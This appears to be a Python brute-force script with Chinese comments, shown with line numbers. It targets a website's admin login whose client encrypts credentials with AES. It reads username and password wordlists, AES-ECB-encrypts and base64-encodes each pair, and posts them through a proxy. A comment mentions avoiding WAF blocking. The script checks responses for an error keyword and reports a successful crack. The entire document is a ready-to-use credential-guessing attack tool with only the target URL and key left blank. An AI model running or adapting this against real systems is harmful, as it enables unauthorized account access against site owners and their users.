1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117
| from cryptography.fernet import Fernet import requests import time import base64 from Crypto.Cipher import AES from Crypto.Util.Padding import pad import json
# 发包休眠时间,防止waf被封 # sleep = time.sleep(20)
# 代理地址池 proxies = { 'http': 'http://localhost:7890', 'https': 'http://localhost:7890' }
headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/123.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Sec-Gpc": "1", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Te": "trailers", "Connection": "close" }
# post 设置需要发送的表单数据 def setPost(username,password): files = { "user.userid": (None, username), "user.userpassword": (None, password), } return files
def input_usernameData(): userList = [] with open(r"./username.txt",encoding="utf=8") as f: for u in f.readlines(): u = u.strip("\n") userList.append(u) # print(List) print("[+] 装载用户名字典,数量:{}".format(len(userList))) return userList
def input_passwordData(): passwordList = [] with open(r"./password.txt",encoding="utf=8") as f: for u in f.readlines(): u = u.strip("\n") passwordList.append(u) # print(List) print("[+] 装载密码字典,数量:{}".format(len(passwordList))) return passwordList
def getRequest(data): # 目标 url = "填写网站登录后台地址" print("[+] 爆破目标:{}".format(url)) respond = requests.post(url=url,files=data,headers=headers,proxies=proxies) print("[+] http.status: {},http.length: {}".format(respond.status_code, len(respond.content))) print(respond.text) # 响应包错误标志词 if "错误" in respond.text: return 1 else: return 0
def aesCrypto(userList,passwordList): # aes key key = b"填写aes密钥" # key = key.encode('utf-8') print("[+] 读取aes密钥:{}".format(key))
cipher = AES.new(key,AES.MODE_ECB) for u in userList: u = u.encode('utf-8') # 加密 userData = pad(u,AES.block_size) encryted_username = cipher.encrypt(userData) base64_encryted_username = base64.b64encode(encryted_username).decode('utf-8') for p in passwordList: p = p.encode('utf-8') passwordData = pad(p,AES.block_size) encryted_password = cipher.encrypt(passwordData) base64_encryted_password = base64.b64encode(encryted_password).decode('utf-8') IP = whatIP() print("--------------------------") print("[+] 当前出口IP:{}".format(IP)) print("[+] payload用户名:{},payload密码:{}".format(base64_encryted_username,base64_encryted_password)) dealFiles = setPost(base64_encryted_username,base64_encryted_password) # print("[+] POST载荷{}".format(dealFiles)) result = getRequest(dealFiles) if result == 1: print("[+] 密码错误……\n--------------------------\n") # 休眠时间 # time.sleep(sleep) time.sleep(5) else: print("\033[0;34m【+】\033[0m"+" 爆破成功!\n用户名:{},密码:{}".format(u,p)) break
def whatIP(): IP = requests.get(url="https://httpbin.org/ip",headers=headers) IP = json.loads(IP.text) IP = IP["origin"] return IP
if __name__ == "__main__": print("AES password blasting启动中……") username_list = input_usernameData() password_list = input_passwordData() aesCrypto(username_list,password_list) print("[+] running over~")
|